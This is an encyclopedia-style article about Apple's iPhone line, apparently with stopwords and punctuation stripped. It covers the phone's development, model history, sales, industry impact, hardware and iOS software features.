    "text": "IPhone:iphone iphone line smartphones designed marketed apple inc. generations iphone use apple ios mobile operating system software first-generation iphone released june 29 2007 multiple new hardware iterations new ios releases released since user interface built around device multi-touch screen including virtual keyboard iphone wi-fi connect cellular networks iphone take photos play music send receive email browse web send receive text messages record notes perform mathematical calculations receive visual voicemail shooting video also became standard feature iphone 3gs functionality video games reference works social networking enabled downloading mobile apps apple app store contained 2.2 million applications available iphone apple released twelve generations iphone models accompanied one twelve major releases ios operating system first-generation iphone gsm phone established design precedents button placement persisted throughout releases screen size maintained next four iterations iphone 3g added 3g network support followed iphone 3gs improved hardware iphone 4 metal chassis higher display resolution front-facing camera iphone 4s improved hardware voice assistant siri iphone 5 featured taller 4-inch display apple newly introduced lightning connector 2013 apple released iphone 5s improved hardware fingerprint reader lower-cost iphone 5c version 5 colored plastic casings instead metal followed larger iphone 6 iphone 6 plus models featuring displays iphone 6s introduced following year featured hardware upgrades support pressure-sensitive touch inputs well iphone se—which featured hardware 6s smaller form factor 5s 2016 apple unveiled iphone 7 iphone 7 plus add water resistance improved system graphics performance new rear dual-camera setup plus model new color options removing 3.5 mm headphone jack found previous models iphone 8 iphone 8 plus released 2017 adding glass back improved screen camera iphone x released alongside iphone 8 iphone 8 plus highlights near bezel-less design improved camera new facial recognition system named face id home button therefore touch id september 2018 apple released 3 new iphones iphone xs upgraded version since discontinued iphone x iphone xs max larger variant series biggest display iphone xr lower end version iphone x first-generation iphone described revolutionary game-changer mobile phone industry subsequent iterations iphone also garnered praise iphone one widely used smartphones world success credited helping apple become one world valuable publicly traded companies november 1 2018 total 2.2 billion iphones sold development become iphone began 2004 apple started gather team 1,000 employees including jonathan ive designer behind imac ipod work highly confidential project purple apple ceo steve jobs steered original focus away tablet apple eventually revisited form ipad towards phone apple created device secretive collaboration cingular wireless became mobility time—at estimated development cost us 150 million thirty months according steve jobs word imac therefore ipod iphone ipad stands internet individual instruct inform inspire apple rejected design committee approach yielded motorola rokr e1 largely unsuccessful collaboration motorola among deficiencies rokr e1 firmware limited storage 100 itunes songs avoid competing apple ipod nano cingular gave apple liberty develop iphone hardware software in-house even paid apple fraction monthly service revenue iphone 3g exchange four years exclusive us sales 2011 jobs unveiled iphone public january 9 2007 macworld 2007 convention moscone center san francisco two initial models 4 gb model priced us 499 8 gb model us 599 requiring two-year contract went sale united states june 29 2007 6:00 pm local time hundreds customers lined outside stores nationwide passionate reaction launch iphone resulted sections media dubbing 'jesus phone following successful release us first generation iphone made available uk france germany november 2007 ireland austria spring 2008 july 11 2008 apple released iphone 3g twenty-two countries including original six apple released iphone 3g upwards eighty countries territories apple announced iphone 3gs june 8 2009 along plans release later june july august starting us canada major european countries june 19 many would-be users objected iphone cost 40 users household incomes us 100,000 back original first generation iphone made aluminum black plastic accent iphone 3g 3gs feature full plastic back increase strength gsm signal iphone 3g available 8 gb black model black white option 16 gb model iphone 3gs available colors regardless storage capacity iphone 4 aluminosilicate glass front back stainless steel edge serves antennas first available black white version announced released april 2011 10 months later users iphone 4 reported dropped/disconnected telephone calls holding phones certain way became known antennagate january 11 2011 verizon announced media event reached agreement apple would begin selling cdma iphone 4 verizon said would available pre-order february 3 release set february 10 february 2011 verizon iphone accounted 4.5 iphone ad impressions us millennial media mobile ad network 2007 2011 apple spent 647 million advertising iphone us tuesday september 27 apple sent invitations press event held october 4 2011 10:00 cupertino headquarters announce details next generation iphone turned iphone 4s 1 million 4s models sold first 24 hours release october 2011 due large volumes iphone manufactured high selling price apple became largest mobile handset vendor world revenue 2011 surpassing long-time leader nokia american carrier c spire wireless announced would carrying iphone 4s october 19 2011 january 2012 apple reported best quarterly earnings ever 53 revenue coming sale 37 million iphones average selling price nearly 660 average selling price remained fairly constant phone lifespan hovering 622 660 production price iphone 4s estimated ihs isuppli october 2011 188 207 245 16 gb 32 gb 64 gb models respectively labor costs estimated 12.50 30 per unit workers iphone assembly line making 1.78 hour february 2012 comscore reported 12.4 us mobile subscribers used iphone approximately 6.4 million iphones active us alone september 12 2012 apple announced iphone 5 4-inch display predecessors 3.5-inch screen device comes 326 pixels per inch found iphone 4 4s iphone 5 soc a6 processor chip 22 smaller iphone 4s a5 twice fast doubling graphics performance predecessor device 18 thinner iphone 4s measuring 20 lighter july 6 2013 reported apple talks korean mobile carrier sk telecom release next generation iphone lte advanced technology july 22 2013 company suppliers said apple testing larger screens iphone ipad apple asked prototype smartphone screens larger four inches also asked screen designs new tablet device measuring slightly less 13 inches diagonally said september 10 2013 apple unveiled two new iphone models highly anticipated press event cupertino iphone 5c mid-range-priced version handset designed increase accessibility due price available five colors green blue yellow pink white made plastic iphone 5s comes three colors black white gold home button replaced fingerprint scanner touch id phones shipped september 20 2013 september 9 2014 apple revealed iphone 6 iphone 6 plus event cupertino devices larger screen predecessor 4.7 5.5 inches respectively 2016 apple unveiled iphone 7 7 plus added water dust resistance improved system graphics performance new dual-camera setup plus model new color options featured removal 3.5 mm headphone jack iphone september 12 2017 apple officially unveiled iphone 8 8 plus features new glass design camera improvements true tone display wireless charging improved system performance also unveiled iphone x features near bezel-less design facial recognition feature dubbed face id facial tracking used animojis oled screen highest pixel density iphone new telephoto lens works better low light conditions improved cameras ar september 12 2018 apple officially unveiled iphone xs xs max xr steve jobs theater apple park xs xs max feature improved super retina display dolby vision hdr10 support xs max featuring larger 6.5 display improved cameras smart hdr a12 bionic chip iphone xs xs max ip68 water liquid dust resistant allow devices submerged 2 meters duration 30 minutes iphone xr retained ip67 certification found first-generation iphone x also features ips lcd display instead oled displays found higher end models iphone xs/xs max ip68 certifications tested using various liquids chlorinated-water salt water tea wine beer juices apple also announced fourth generation apple watch apple watch series 4 apple sold 6.1 million first generation iphone units five quarters sales fourth quarter 2008 temporarily surpassed research motion rim blackberry sales 5.2 million units briefly made apple third largest mobile phone manufacturer revenue nokia samsung however income deferred recorded sales grew steadily thereafter end fiscal year 2010 total 73.5 million iphones sold 2010 iphone market share barely 4 cell phones however apple pulled 50 total profit global cellphone sales generated apple sold 14.1 million iphones third quarter 2010 representing 91 unit growth year-ago quarter well ahead idc latest published estimate 64 growth global smartphone market september quarter apple sales surpassed research motion 12.1 million blackberry units sold recent quarter ended august 2010 united states market alone third quarter 2010 9.1 million android-powered smartphones shipped 43.6 market apple ios number two phone operating system 26.2 5.5 million iphones sold made popular single device march 2 2011 ipad 2 launch event apple announced sold 100 million iphones worldwide result success iphone sales volume high selling price headlined iphone 4s apple became largest mobile handset vendor world revenue 2011 surpassing long-time leader nokia samsung galaxy ii proved popular iphone 4s parts europe iphone 4s dominant united states january 2012 apple reported best quarterly earnings ever 53 revenue coming sale 37 million iphones average selling price nearly 660 average selling price remained fairly constant phone lifespan hovering 622 660 eight largest phone manufacturers q1 2012 according horace dediu asymco apple samsung combined take 99 industry profits htc took remaining 1 rim lg sony ericsson motorola nokia suffered losses apple earning 73 cents every dollar earned phone makers industry profits grew 5.3 billion first quarter 2010 14.4 billion first quarter 2012 quadruple profits 2007 apple managed increase share profits due increasing carrier subsidies high selling prices iphone negative effect wireless carriers mobility verizon sprint seen ebitda service margins drop sold increasing number iphones quarter ended march 31 2012 apple sales iphone alone 22.7 billion exceeded total microsoft businesses 17.4 billion fourth quarter 2012 iphone 5 iphone 4s best-selling handsets sales 27.4 million 13 smartphones worldwide 17.4 million units respectively samsung galaxy iii third 15.4 million according strategy analytics data impressive performance given iphone portfolio premium pricing adding galaxy iii global popularity appears peaked galaxy iii touted iphone-killer press released samsung led worldwide sales smartphones apple iphone line still managed top samsung smartphone offerings united states 21.4 share 37.8 market respectively ios grew 3.5 37.8 android slid 1.3 fall 52.3 share continued top popularity iphone despite growing android competition also attributed apple able deliver ios updates air android updates frequently impeded carrier testing requirements hardware tailoring forcing consumers purchase new android smartphone get latest version os however 2013 apple market share fallen 13.1 due surging popularity android offerings apple announced september 1 2013 iphone trade-in program would implemented 250 specialty stores us program become available customers must valid contract must purchase new phone rather simply receive credit used later date significant part program goal increase number customers purchase iphones apple stores rather carrier stores september 20 2013 sales date iphone 5s 5c models longest ever queue observed new york city flagship apple store addition prominent queues san francisco us canada however locations throughout world identified anticipation corresponding consumers apple also increased production gold-colored iphone 5s additional one-third due particularly strong demand emerged apple decided introduce gold model finding gold seen popular sign luxury product among chinese customers apple released opening weekend sales results 5c 5s models showing all-time high product sales figures ninemillion handsets sold—the previous record set 2012 fivemillion handsets sold opening weekend 5 model first time apple simultaneously launched two models inclusion china list markets contributed record sales result apple also announced 200 million devices running ios 7 update making fastest software upgrade history apple store located christiana mall newark delaware us claimed highest iphones sales figures november 2013 store high sales results due absence sales tax state delaware finalization deal apple china mobile world largest mobile network announced late december 2013 multi-year agreement provides iphone access 760 million china mobile subscribers first quarter 2014 apple reported sold 51million iphones all-time quarterly record compared 47.8million year-ago quarter iphone upgrade program 24-month program designed consumers able get latest iphone every year without paying whole price up-front program consists low monthly payments consumers gradually pay iphone 24-month period opportunity switch upgrade new iphone 12 months payment passed 12 months passed consumers trade current iphone new one payments transferred old device new device program restarts new 24-month period additional features program include unlocked handsets means consumers free pick network carrier want two-year applecare+ protection includes hardware repairs software support coverage two incidents accidental damage criticism program includes potential endless cycle payments huffington post damon beres writing complete full 24-month payment cycle 're stuck outdated phone upgrade every 12 months 'll never stop owing apple money iphones additionally program limited iphone hardware cell phone service network operator included release iphone handset manufacturers nokia motorola enjoying record sales cell phones based fashion brand rather technological innovation smartphone market dominated time blackberry os windows mobile devices staid corporate-led smartphone paradigm focused enterprise needs phones time designed around carrier business limits conservative regards bandwidth usage battery life phones sold large number models often segmented marketing strategy confusing customers sapping engineering resources example phones marketed business often deliberately stripped cameras ability play music games apple approach deliberately simplify product line offering one model year customers making expensive high-end product apple marketing developing success ipod campaigns allowed phone become mass-market product many buyers launch day market research found unusually technology product iphone users disproportionately female ars technica noted 2012 apple avoided 'patronizing marketing female customers practice used often sell low-quality high-priced products many competitors then-ceo research motion mike lazaridis pried open iphone impression mac stuffed cellphone used much memory processing power smartphones market time capacitive touchscreen consumer-friendly design iphone fundamentally changed mobile industry steve jobs proclaiming 2007 phone communication tool way life dominant mobile operating systems time symbian blackberry os windows mobile designed handle additional tasks beyond communication basic functions operating systems never focused applications developers due infighting among manufacturers well complexity developing low-memory hardware never developed thriving ecosystem like apple app store android google play iphone os renamed ios 2010 designed robust os capabilities multitasking graphics order meet future consumer demands many services provided mobile carriers often extensively customized devices meanwhile apple decision base os os x unexpected benefit allowing os x developers rapidly expand ios development rival manufacturers forced spend software development costs catch iphone iphone success led decline sales high-end fashion phones business-oriented smartphones vertu blackberry well nokia nokia realised limitations operating system symbian attempted develop advanced system maemo without success ultimately agreed technology-sharing deal takeover microsoft prior iphone handsets viewed largely cheap disposable lures massively subsidized snare subscribers lock using carriers proprietary services however according wired apple retained complete control design manufacturing marketing iphone meaning carrier would control software updates extension security patches contrast google allowed carriers oems dictate pace upgrades pre-load phones software top android result many android oems often lag months behind google release next iteration android although nexus pixel devices guaranteed two years operating system updates third addition year security however apple supported older iterations iphones four years december 2017 reports apple using policy slowing speed older iphones issuing operating system upgrades spurred allegations firm using tactic prompt users older iphones buy newer models iphone 4 iphone models well ios devices manufactured exclusively foxconn based taiwan 2011 tim cook became ceo company apple changed outsourcing strategy first time increasing supply partners iphone 4s 2012 first model manufactured simultaneously two stand-alone companies foxconn well pegatron also based taiwan although foxconn still responsible larger share production pegatron orders slowly increased company tasked producing part iphone 5c line 2013 30 iphone 6 devices 2014 6 plus model produced solely foxconn touchscreen first five generations 9 cm 3.5 liquid crystal display scratch-resistant glass one iphone 5 four inches capacitive touchscreen designed bare finger multiple fingers multi-touch sensing screens first three generations resolution 320×480 hvga 163 ppi iphone 4 iphone 4s resolution 640×960 326 ppi 4-inch models 640×1136 326 ppi 4.7-inch models 750×1334 326 ppi 5.5-inch models 1080×1920 401 ppi 5.8-inch model x 1125×2436 458 ppi initial models using twisted-nematic tn lcds starting iphone 4 technology changed in-plane switching ips lcds iphone 5 model screen results aspect ratio approximately 16:9 iphone x first iphone use oled display near bezel-less screen ≈19.5:9 aspect ratio touch gesture features iphone based technology originally developed fingerworks gloves styli prevent necessary electrical conductivity although capacitive styli used iphone finger-touch screen iphone 3gs later also feature fingerprint-resistant oleophobic coating iphone minimal hardware user interface models featuring five buttons physical menu button situated directly display called home button primary function close active app navigates home screen interface earlier models included rounded square reminiscent shape icons home screen however new models include apple fingerprint recognition feature touch id use home button fingerprint sensor symbol iphone x later n't home button instead face id facial recognition authentication method multi-function sleep/wake button located top device serves unit power button also controls phone calls call received pressing sleep/wake button silences ringtone pressed twice transfers call voicemail situated left spine volume adjustment controls iphone 4 two separate circular buttons increase decrease volume earlier models house two switches single plastic panel known rocker switch could reasonably counted either one two buttons directly volume controls ring/silent switch engaged mutes telephone ringing alert sounds new sent emails text messages push notifications camera shutter sounds voice memo sound effects phone lock/unlock sounds keyboard clicks spoken auto-corrections switch mute alarm sounds clock application countries regions mute camera shutter voice memo sound effects buttons except home made plastic original first generation iphone metal later models touchscreen furnishes remainder user interface software update january 2008 allowed first-generation iphone use cell tower wi-fi network locations trilateration despite lacking gps hardware since iphone 3g generation iphone employs a-gps operated united states since iphone 4s generation device also supports glonass global positioning system operated russia since iphone 8 supports galileo iphone 6s 6s plus introduced 2015 feature 3d touch displays allows screen recognize hard pressed using pressure sensitive multi-touch technology subsequent iphones exception iphone se iphone xr feature example technology used lightly pressing screen preview photograph pressing take iphones feature number sensors used adjust screen based operating conditions enable motion-controlled games location-based services unlock phone authenticate purchases apple pay among many things proximity sensor deactivates display touchscreen device brought near face call done save battery power prevent inadvertent inputs user face ears ambient light sensor adjusts display brightness saves battery power prevents screen bright dark 3-axis accelerometer senses orientation phone changes screen accordingly allowing user easily switch portrait landscape mode photo browsing web browsing music playing support upright left right widescreen orientations unlike ipad iphone rotate screen turned upside-down home button screen unless running program specifically designed 3.0 update added landscape support still applications email introduced shaking unit form input generally undo functionality accelerometer also used control third-party apps notably games also used fitness tracking purposes primarily pedometer starting iphone 5s functionality included m7 motion coprocessor subsequent revisions embedded chip magnetometer built-in since iphone 3gs used measure strength direction magnetic field vicinity device sometimes certain devices radio signals interfere magnetometer requiring users either move away interference re-calibrate moving device figure-eight motion since iphone 3gs iphone also features compass app unique time release showing compass points direction magnetic field beginning iphone 4 apple smartphones also include gyroscopic sensor enhancing perception moved previous iphone models contained chip capable receiving radio signals however apple fm radio feature switched antenna connected chip later iterations iphone starting iphone 7 however contain radio chips campaign called free radio phone started encourage cellphone manufacturers apple enable radio phones manufacture reasons cited radio drains less power useful emergency 2016 fort mcmurray wildfire 2017 iphone models starting iphone 5s excluding iphone 5c featured apple fingerprint recognition sensor used unlocking device authenticating apple pay purchases since iphone 6 using touch id located home button touch id replaced face id starting iphone x included iphone 6 later excluding iphone se barometer used determine air pressure elevation device starting iphone x facial recognition sensor named truedepth camera system featured used unlocking device authenticating purchases using face id also used animojis ar bottom iphone speaker left dock connector microphone right additional loudspeaker screen serves earpiece phone calls iphone 4 includes additional microphone top unit noise cancellation switches placement microphone speaker base unit—the speaker right volume controls located left side iphone models slider ipod application 3.5 mm trrs connector headphones located top left corner device first five generations original 4s time moved bottom left corner headphone socket first-generation iphone recessed casing making incompatible headsets without use adapter subsequent generations eliminated problem using flush-mounted headphone socket cars equipped auxiliary jack allow handsfree use iphone driving substitute bluetooth iphone 7 later 3.5 mm headphone jack instead headsets must connect iphone bluetooth use apple lightning port replaced 3.5 mm headphone jack traditional headsets use lightning 3.5 mm headphone jack adapter included iphone 7 iphone x plugs lightning port apple headset multipurpose button near microphone play pause music skip tracks answer end phone calls without touching iphone third-party headsets designed iphone also include microphone control button current headsets also provide volume controls compatible recent models fourth ring audio jack carries extra information built-in bluetooth 2.x+edr supports wireless earpieces headphones requires hsp profile stereo audio added 3.0 update hardware supports a2dp non-sanctioned third-party solutions exist iphone officially support obex file transfer protocol lack profiles prevents iphone users exchanging multimedia files pictures music videos bluetooth-enabled cell phones composite component video 576i stereo audio output dock connector using adapter sold apple iphone 4 also supports 1024×768 vga output without audio hdmi output stereo audio via dock adapters iphone support voice recording 3.0 software update iphone features internal rechargeable lithium-ion battery like ipod unlike mobile phones time launch battery user-replaceable iphone charged connected computer syncing across included usb dock connector cable similar charging ipod alternatively usb ac adapter wall charger also included connected cable charge directly ac outlet models iphone support wireless charging apple runs tests preproduction units determine battery life apple website says battery life designed retain 80 original capacity 400 full charge discharge cycles comparable ipod batteries battery life early models iphone criticized several technology journalists insufficient less apple claims also reflected j. d. power associates customer satisfaction survey gave battery aspects iphone 3g lowest rating two five stars battery malfunctions dies prematurely phone returned apple replaced free still warranty warranty lasts one year purchase extended two years applecare battery replacement service pricing made known buyers day product launched similar apple third parties replace batteries ipods foundation taxpayer consumer rights consumer advocate group sent complaint apple fee consumers pay battery replaced apple reduced price out-of-warranty iphone battery replacement 29 since july 2007 third-party battery replacement kits available much lower price apple battery replacement program kits often include small screwdriver instruction leaflet many newer ipod models battery first generation iphone soldered therefore soldering iron required install new battery iphone 3g uses different battery fitted connector easier replace iphone x features different battery two battery cells adhesive pull tabs adhered sides instead folded top therefore making repairs little difficult patent filed corporation published late july 2013 revealed development new iphone battery system uses location data combination data user habits moderate handsets power settings accordingly apple working towards power management system provide features ability estimate length time user away power source modify energy usage detection function adjusts charging rate best suit type power source used december 28 2017 amidst many complaints older iphone models slowing new ones released apple released communication customers website acknowledging effect old batteries iphone performance company offered 29 battery replacements solution first-generation iphone iphone 3g fixed-focus 2.0-megapixel camera back digital photos optical zoom flash autofocus natively support video recording video recording possible first-generation iphone iphone 3g via third-party app available app store jailbreaking iphone os 2.0 introduced geotagging photos iphone 3gs 3.2-megapixel camera autofocus auto white balance auto macro 10 cm manufactured omnivision camera also capture 640×480 vga resolution video 30 frames per second video cropped iphone directly uploaded youtube services iphone 4 introduced 5.0-megapixel camera 2592×1936 pixels record video 720p resolution considered high-definition also backside-illuminated sensor capture pictures low light led flash stay lit recording video first iphone natively high dynamic range photography iphone 4 also second camera front take vga photos record sd video saved recordings may synced host computer attached email supported sent mms iphone 4s camera shoot 8-mp stills 1080p video accessed directly lock screen triggered using volume-up button shutter trigger built-in gyroscope stabilize image recording video iphone 5 iphone 4s running ios 6 later take panoramas using built-in camera app iphone 5 also take still photos recording video camera iphone 5 reportedly shows purple haze light source frame although consumer reports said prone purple hazing photos shot bright light source predecessor several android phones fine cameras ... five model generations phone configured bring camera app quickly pressing home key twice iphones running also accessed lock screen directly iphone 5s features true tone flash two led lights white amber improve white balance adjusted 1,000 combinations image sensor 15 percent larger previous model iphone 6 6 plus include phase detection autofocus 6 plus optical image stabilization models shoot 1080p videos 60 frames per second release ios 8 iphone 4s later models shoot time-lapse videos capability switch frame rates automatically recording increases time iphone 6s 6s plus outfitted 12 megapixel camera 4k hd video capability front-facing camera upgraded 5 megapixels user may change resolution 4k 1080p settings iphone se features 12 mp camera found iphone 6s iphone 6s plus models 4k video capability front camera 1.2 mp iphone 7 features optical image stabilization rear camera feature previously exclusive plus models 7 plus first iphone feature dual-lens cameras 12 mp models 7 mp front-facing camera second camera iphone 7 plus telephoto lens enables 2× optical zoom 10× digital zoom rear cameras 7 7 plus f/1.8 aperture also new quad-led true tone flash brighter compared predecessors iphone 8 camera remains largely predecessor features larger sensor newer color filter camera also record 4k 60 24 frames per second slow-mo 1080p 240 frames per second new camera system also enables portrait lighting defines light scene also features quad-led true tone flash 2× better light uniformity slow sync iphone x camera almost iphone 8 camera telephoto lens aperture f/2.4 optical image stabilization front camera also portrait mode portrait lighting due new truedepth camera system iphone xs xs max xr updated 12mp 1/2.55 sensor size 1.4 μm pixel size xs series telephoto lens lower end xr one lens iphone initially released two options internal storage size 4 8gb september 5 2007 apple discontinued 4gb models february 5 2008 apple added 16gb model iphone 3g available 8 16gb released 2008 iphone 3gs came 16 32gb variants remained available 8gb september 2012 three years launch iphone 4 available 16 32gb variants well 8gb variant sold alongside iphone 4s reduced price point iphone 4s available three sizes 16 32 64gb iphone 5 5s available three sizes iphone 4s 16 32 64gb.. lower-cost iphone 5c model initially available 16 32gb models 8gb model added later iphone 6 6s available three sizes launch 16 64 128gb iphone se available 16 64gb variants launch iphone 7 7 plus released apple changed base model storage capacity 16 32gb iphone 7 7 plus configurations 32 128 256gb storage apple doubled storage iphone 6s 6s plus two configurations 32 128gb well iphone se six months later iphone 8 8 plus x changed base model capacity 64gb retaining 256gb storage option iphone xs xs max introduced 512gb storage option addition existing 64 256 gb options iphone xr comes three storage options 64 128 256gb gsm models iphone use sim card identify gsm network sim sits tray inserted slot top device sim tray ejected paper clip sim ejector tool simple piece die-cut sheet metal included iphone 3g 3gs united states models elsewhere world iphone models shipped sim ejector tool fabricated alloy dubbed liquidmetal countries iphone usually sold sim lock prevents iphone used different mobile network gsm iphone 4 features microsim card located slot right side device cdma model iphone 4 cdma-only cell phone use sim card sim card slot iphone 4s activated cdma carrier however sim card slot rely sim card activation cdma network cdma-activated iphone 4s usually carrier-approved roaming sim preloaded sim slot time purchase used roaming certain carrier-approved international gsm networks sim slot locked use roaming sim card provided cdma carrier case verizon example one request sim slot unlocked international use calling support number requesting international unlock account good standing past 60 days method unlocks iphone 4s use international carriers iphone 4s unlocked way reject non international sim cards mobility t-mobile usa example iphone 5 later iphones use nano-sim order save space internally iphone xs xs max xr added esim support addition nano-sim therefore support dual sim functionality iphones well many devices apple small disc bottom headphone jack changes white red contact water iphone 3g later models also similar indicator bottom dock connector apple warranties cover water damage employees examine indicators approving warranty repair replacement however adoption water resistance feature iphone practice longer use apple iphone indicators exposed mobile phones manufacturers carry protected location beneath battery behind battery cover indicators triggered routine use owner sweat steam bathroom light environmental moisture criticism led apple change water damage policy iphones similar products allowing customers request internal inspection phone verify internal liquid damage sensors triggered iphone models include written documentation dock connector usb cable first generation 3g iphones also came cleaning cloth first generation iphone includes stereo headset earbuds microphone plastic dock hold unit upright charging syncing iphone 3g includes similar headset plus sim eject tool first generation model requires paperclip iphone 3gs includes sim eject tool revised headset adds volume buttons functional previous iphone versions iphone 3g 3gs compatible dock sold separately first generation model dock versions include usb power adapter wall charger allows iphone charge ac outlet iphone 3g iphone 3gs sold north america japan colombia ecuador peru include ultracompact usb power adapter september 2014 launch iphone 6 apple announced apple pay mobile payment system feature aimed revolutionize way users pay uses nfc chip touch id fingerprint scanner face id iphone x later apple wallet app dedicated secure element chip encrypted payment information make purchases participating stores physical online iphone models haptic engine vibrate notification alert incoming call etc iphone models iphone 4s use eccentric rotating mass motor iphone 4s uses linear resonant actuator vibrator usually uses less power creates quieter vibration however iphone 5 5c 5s uses eccentric rotating mass motor unsure apple decided switch back however iphone 6 6 plus uses linear resonant actuator vibrator iphone 6s uses taptic engine vibration haptic feedback works similar eccentric rotating mass motor iphone runs operating system known ios formerly iphone os variant darwin operating system core found macos also included core animation software component mac os x v10.5 leopard together graphics hardware iphone 3gs opengl es 2.0 responsible interface motion graphics iphone comes set bundled applications developed apple supports downloading third-party applications app store apple provides free updates operating system iphone either wirelessly itunes major new updates historically accompanied new models size operating system depends version ios 8 required 4.5 gb successor required 1.3 gb interface based around home screen graphical list available applications iphone applications normally run one time starting iphone 4 primitive version multitasking came play users could double click home button select recently opened applications however apps never ran background starting ios 7 though apps truly multitask open application runs background use although functionality still available making call listening music home screen accessed hardware button screen iphone 8 earlier iphone x later models require swipe original iphone contained following apps messages sms mms messaging calendar photos camera youtube stocks maps google maps weather voice memos notes clock calculator settings itunes store app store introduced iphone 3gs iphone 4 compass facetime gamecenter added ios 4 4.1 respectively ios 5 reminders newsstand added ipod application split separate music videos applications ios 6 added passbook well updated version maps relies data provided tomtom well sources youtube longer came pre-installed application ios 8 added health app ios 9 replaced newsstand passbook news wallet ios 10 introduces home ios 11 added files ios 12 introduces measure app uses ar technology measure objects things available devices a9 chip newer docked base screen four icons phone mail safari internet music delineate iphone main purposes january 15 2008 apple released software update 1.1.3 allowing users create web clips home screen icons resemble apps open user-defined page safari update iphone users rearrange place icons holding icon moving desired location start shaking nine adjacent home screens accessed horizontal swipe users also add delete icons dock every home screen home screen holds twenty icons first-generation iphone 3g 4 4s home screen iphone 5 holds twenty-four icons due larger screen display dock holds four icons users delete web clips third-party applications time may select certain applications transfer itunes apple default programs could removed since ios 10 update 3.0 update adds system-wide search known spotlight left first home screen almost input given touch screen understands complex gestures using multi-touch iphone interaction techniques enable user move content touch-drag motion finger example zooming web pages photos done placing two fingers screen spreading farther apart bringing closer together gesture known pinching scrolling long list menu achieved sliding finger display bottom top vice versa go back either case list moves pasted outer surface wheel slowly decelerating affected friction way interface simulates physics real object unlike previous scrollable views user pressed control move view downwards ios user pushes upwards moving plank wood floating water creating impression user directly manipulating content displayed screen user-centered interactive effects include horizontally sliding sub-selection vertically sliding keyboard bookmarks menu widgets turn around allow settings configured side menu bars found top bottom screen necessary options vary program always follow consistent style motif menu hierarchies back button top-left corner screen displays name parent folder iphone allows audio conferencing call holding call merging caller id integration cellular network features iphone functions example music playing call received music fades fades back call ended proximity sensor shuts screen touch-sensitive circuitry iphone brought close face save battery prevent unintentional touches iphone support video calling videoconferencing versions prior fourth generation one camera opposite side screen iphone 4 supports video calling using either front back camera wi-fi feature apple calls facetime voice control introduced iphone 3gs allows users say contact name number iphone dial first two models support voice dialing third-party applications iphone includes visual voicemail countries feature allowing users view list current voicemail messages on-screen without call voicemail unlike systems messages listened deleted non-chronological order choosing message on-screen list music ringtone feature introduced united states september 5 2007 users create custom ringtones songs purchased itunes store small additional fee ringtones three 30 seconds long part song fade pause half second five seconds looped loop continuously customizing done itunes apple garageband software 4.1.1 later available mac os x third-party tools release ios 6 released september 19 2012 apple added features enable user options decline phone call person calling user reply message set reminder call back later time layout music library similar ipod iphone sort media library songs artists albums videos playlists genres composers podcasts audiobooks compilations options presented alphabetically except playlists retain order itunes iphone uses large font allows users plenty room touch selection users rotate device horizontally landscape mode access cover flow like itunes feature shows different album covers scroll-through photo library scrolling achieved swiping finger across screen alternatively headset controls used pause play skip repeat tracks iphone 3gs volume changed included apple earphones voice control feature used identify track play songs playlist specific artist create genius playlist iphone supports gapless playback like fifth-generation ipods introduced 2005 iphone play digital video allowing users watch tv shows movies widescreen double-tapping switches widescreen video playback iphone allows users purchase download songs itunes store directly iphone feature originally required wi-fi network since 2012 used cellular data network iphone includes software allows user upload view email photos taken camera user zooms photos sliding two fingers apart closer together much like safari camera application also lets users view camera roll pictures taken iphone camera pictures also available photos application along transferred iphoto aperture mac photoshop windows pc internet access available iphone connected local area wi-fi wide area gsm edge network second-generation 2g wireless data standards iphone 3g introduced support third-generation umts hsdpa 3.6 iphone 4s introduced support hsupa networks 14.4 mbit/s support hsdpa 7.2 introduced iphone 3gs networks accessible iphone models include 1xrtt represented 1× status bar gprs shown gprs status bar edge shown capital e status bar umts ev-do shown 3g faster version umts 4g shown 4g symbol status bar lte shown lte status bar 5g evolution supported areas implemented stylized larger 5g reduced size capital e. 5ge uses 4x4 mimo doubling number antennas 256-qam three-way carrier aggregation true 5g expected iphone 2020 release introduced 3g july 2004 late 2007 steve jobs stated still widespread enough us chipsets energy efficient enough included iphone support 802.1x authentication system commonly used university corporate wi-fi networks added 2.0 version update default iphone ask join newly discovered wi-fi networks prompt password required alternatively join closed wi-fi networks manually iphone automatically choose strongest network connecting wi-fi instead edge available similarly iphone 3g onwards prefer 3g 2g wi-fi either wi-fi bluetooth 3g iphone 3g onwards deactivated individually airplane mode disables wireless connections overriding preferences however airplane mode one explicitly enable wi-fi and/or bluetooth modes join continue operate one networks cellular network transceivers remain safari iphone native web browser displays pages similar mac windows counterparts web pages may viewed portrait landscape mode device supports automatic zooming pinching together spreading apart fingertips screen double-tapping text images safari allow file downloads except predefined extensions iphone support flash still popular iphone introduced consequently uk advertising standards authority adjudicated advertisement claiming iphone could access parts internet withdrawn current form grounds false advertising rare public letter april 2010 apple ceo steve jobs outlined reasoning behind absence flash iphone ipad iphone supports svg css html canvas bonjour google chrome introduced ios june 26 2012 opera mini also available maps application access google maps map satellite hybrid form also generate directions two locations providing optional real-time traffic information iphone announcement jobs demonstrated feature searching nearby starbucks locations placing prank call one single tap support walking directions public transit street view added version 2.2 software update voice-guided navigation iphone 3gs iphone 4 orient map digital compass apple also developed separate application view youtube videos iphone streams videos encoding using h.264 codec simple weather stock quotes applications also tap internet iphone users access internet frequently variety places according google 2008 iphone generated 50 times search requests mobile handset according deutsche telekom ceo rené obermann average internet usage iphone customer 100 megabytes 30 times use average contract-based consumer customers nielsen found 98 iphone users use data services 88 use internet china iphone 3g iphone 3gs built distributed without wi-fi introduction verizon iphone january 2011 issue using internet phone brought public attention two us carriers internet phone could used simultaneously networks whereas verizon networks support use separately however 2014 verizon announced iphone 6 6 plus would allow simultaneous voice data lte network t-mobile sprint enabled calls wi-fi verizon soon text input iphone implements virtual keyboard touchscreen automatic spell checking correction predictive word capabilities dynamic dictionary learns new words keyboard predict word user typing complete correct accidental pressing keys near presumed desired key keys somewhat larger spaced farther apart landscape mode supported limited number applications touching section text brief time brings magnifying glass allowing users place cursor middle existing text virtual keyboard accommodate 21 languages including character recognition chinese alternative characters accents example letters alphabets languages emoji typed keyboard pressing letter two seconds selecting alternative character popup 3.0 update brought support cut copy pasting text well landscape keyboards applications iphone 4s siri allows dictation since ios 8 third party keyboards distributed app store allowed previously available jailbroken iphones iphone also features email program supports html email enables user embed photos email message pdf word excel powerpoint attachments mail messages viewed phone yahoo offers free push-email service iphone imap although push-imap pop3 mail standards also supported including microsoft exchange kerio connect first versions iphone firmware accomplished opening imap exchange server apple also licensed microsoft activesync supports platform including push email release iphone 2.0 firmware iphone sync email account settings apple mail application microsoft outlook microsoft entourage manually configured device email program access almost imap pop3 account text messages presented chronologically mailbox format similar mail places text recipients together replies text messages 